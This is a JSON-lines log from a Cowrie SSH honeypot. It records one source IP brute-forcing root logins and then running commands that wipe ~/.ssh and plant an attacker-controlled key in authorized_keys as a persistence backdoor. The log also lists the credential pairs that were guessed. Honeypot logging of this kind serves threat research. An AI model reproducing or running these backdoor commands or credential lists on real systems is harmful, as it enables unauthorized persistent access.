{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34654,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd8b5b372c27","protocol":"ssh","message":"New connection: 212.227.235.229:34654 (1.2.3.4:22) [session: bd8b5b372c27]","sensor":"my-vps","timestamp":"2025-09-08T22:24:16.594508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:24:16.595709Z","src_ip":"212.227.235.229","session":"bd8b5b372c27"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:24:16.902945Z","src_ip":"212.227.235.229","session":"bd8b5b372c27"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:24:18.175873Z","src_ip":"212.227.235.229","session":"bd8b5b372c27"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:24:19.485943Z","src_ip":"212.227.235.229","session":"bd8b5b372c27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34656,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7ddf9d82f47","protocol":"ssh","message":"New connection: 212.227.235.229:34656 (1.2.3.4:22) [session: d7ddf9d82f47]","sensor":"my-vps","timestamp":"2025-09-08T22:24:19.797626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:24:19.798301Z","src_ip":"212.227.235.229","session":"d7ddf9d82f47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:24:20.111322Z","src_ip":"212.227.235.229","session":"d7ddf9d82f47"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:24:21.406386Z","src_ip":"212.227.235.229","session":"d7ddf9d82f47"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:24:21.663379Z","src_ip":"212.227.235.229","session":"8d88581e70a2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:24:21.721102Z","src_ip":"212.227.235.229","session":"d7ddf9d82f47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54390,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6197ec911df","protocol":"ssh","message":"New connection: 212.227.235.229:54390 (1.2.3.4:22) [session: a6197ec911df]","sensor":"my-vps","timestamp":"2025-09-08T22:24:22.386888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:24:22.387852Z","src_ip":"212.227.235.229","session":"a6197ec911df"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:24:22.718862Z","src_ip":"212.227.235.229","session":"a6197ec911df"}
{"eventid":"cowrie.login.failed","username":"developer","password":"!","message":"login attempt [developer/!] failed","sensor":"my-vps","timestamp":"2025-09-08T22:24:24.080665Z","src_ip":"212.227.235.229","session":"a6197ec911df"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:24:25.413109Z","src_ip":"212.227.235.229","session":"a6197ec911df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60778,"dst_ip":"1.2.3.4","dst_port":22,"session":"8babdc0b2484","protocol":"ssh","message":"New connection: 212.227.235.229:60778 (1.2.3.4:22) [session: 8babdc0b2484]","sensor":"my-vps","timestamp":"2025-09-08T22:24:27.594060Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:24:27.595454Z","src_ip":"212.227.235.229","session":"8babdc0b2484"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:24:27.917160Z","src_ip":"212.227.235.229","session":"8babdc0b2484"}
{"eventid":"cowrie.login.success","username":"root","password":"Sy123456","message":"login attempt [root/Sy123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:24:29.245268Z","src_ip":"212.227.235.229","session":"8babdc0b2484"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:24:29.950644Z","src_ip":"212.227.235.229","session":"8babdc0b2484"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:24:29.951425Z","src_ip":"212.227.235.229","session":"8babdc0b2484"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:24:29.952186Z","src_ip":"212.227.235.229","session":"8babdc0b2484"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:24:30.273332Z","src_ip":"212.227.235.229","session":"8babdc0b2484"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:24:30.937790Z","src_ip":"212.227.235.229","session":"8babdc0b2484"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:24:30.938577Z","src_ip":"212.227.235.229","session":"8babdc0b2484"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:24:31.262280Z","src_ip":"212.227.235.229","session":"8babdc0b2484"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:24:31.263335Z","src_ip":"212.227.235.229","session":"8babdc0b2484"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56876,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5d75ba82513","protocol":"ssh","message":"New connection: 212.227.235.229:56876 (1.2.3.4:22) [session: a5d75ba82513]","sensor":"my-vps","timestamp":"2025-09-08T22:24:31.552708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:24:31.553396Z","src_ip":"212.227.235.229","session":"a5d75ba82513"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:24:31.865340Z","src_ip":"212.227.235.229","session":"a5d75ba82513"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:24:33.146058Z","src_ip":"212.227.235.229","session":"a5d75ba82513"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:24:34.459203Z","src_ip":"212.227.235.229","session":"a5d75ba82513"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56886,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dec9f8c03f2","protocol":"ssh","message":"New connection: 212.227.235.229:56886 (1.2.3.4:22) [session: 1dec9f8c03f2]","sensor":"my-vps","timestamp":"2025-09-08T22:24:34.763525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:24:34.764326Z","src_ip":"212.227.235.229","session":"1dec9f8c03f2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:24:35.066267Z","src_ip":"212.227.235.229","session":"1dec9f8c03f2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:24:36.312029Z","src_ip":"212.227.235.229","session":"1dec9f8c03f2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:24:36.615367Z","src_ip":"212.227.235.229","session":"1dec9f8c03f2"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:24:36.629789Z","src_ip":"212.227.235.229","session":"8babdc0b2484"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58352,"dst_ip":"1.2.3.4","dst_port":22,"session":"b509366383bb","protocol":"ssh","message":"New connection: 212.227.235.229:58352 (1.2.3.4:22) [session: b509366383bb]","sensor":"my-vps","timestamp":"2025-09-08T22:24:41.506153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T22:24:42.184011Z","src_ip":"212.227.235.229","session":"b509366383bb"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-09-08T22:24:42.184678Z","src_ip":"212.227.235.229","session":"b509366383bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51406,"dst_ip":"1.2.3.4","dst_port":23,"session":"8b9a27c86a3f","protocol":"telnet","message":"New connection: 212.227.235.229:51406 (1.2.3.4:23) [session: 8b9a27c86a3f]","sensor":"my-vps","timestamp":"2025-09-08T22:24:47.215379Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45250,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7f314022af4","protocol":"ssh","message":"New connection: 212.227.235.229:45250 (1.2.3.4:22) [session: b7f314022af4]","sensor":"my-vps","timestamp":"2025-09-08T22:24:47.385041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:24:47.385715Z","src_ip":"212.227.235.229","session":"b7f314022af4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:24:47.674838Z","src_ip":"212.227.235.229","session":"b7f314022af4"}
{"eventid":"cowrie.login.failed","username":"matrix","password":"matrix","message":"login attempt [matrix/matrix] failed","sensor":"my-vps","timestamp":"2025-09-08T22:24:48.870401Z","src_ip":"212.227.235.229","session":"b7f314022af4"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:24:50.161920Z","src_ip":"212.227.235.229","session":"b7f314022af4"}
{"eventid":"cowrie.session.closed","duration":"15.7","message":"Connection lost after 15.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:24:57.184282Z","src_ip":"212.227.235.229","session":"b509366383bb"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64200,"dst_ip":"1.2.3.4","dst_port":22,"session":"4aca5ae06af0","protocol":"ssh","message":"New connection: 217.72.205.35:64200 (1.2.3.4:22) [session: 4aca5ae06af0]","sensor":"my-vps","timestamp":"2025-09-08T22:24:58.759164Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:24:58.760342Z","src_ip":"217.72.205.35","session":"4aca5ae06af0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33164,"dst_ip":"1.2.3.4","dst_port":22,"session":"338920db8617","protocol":"ssh","message":"New connection: 212.227.235.229:33164 (1.2.3.4:22) [session: 338920db8617]","sensor":"my-vps","timestamp":"2025-09-08T22:24:58.985937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:24:58.987152Z","src_ip":"212.227.235.229","session":"338920db8617"}
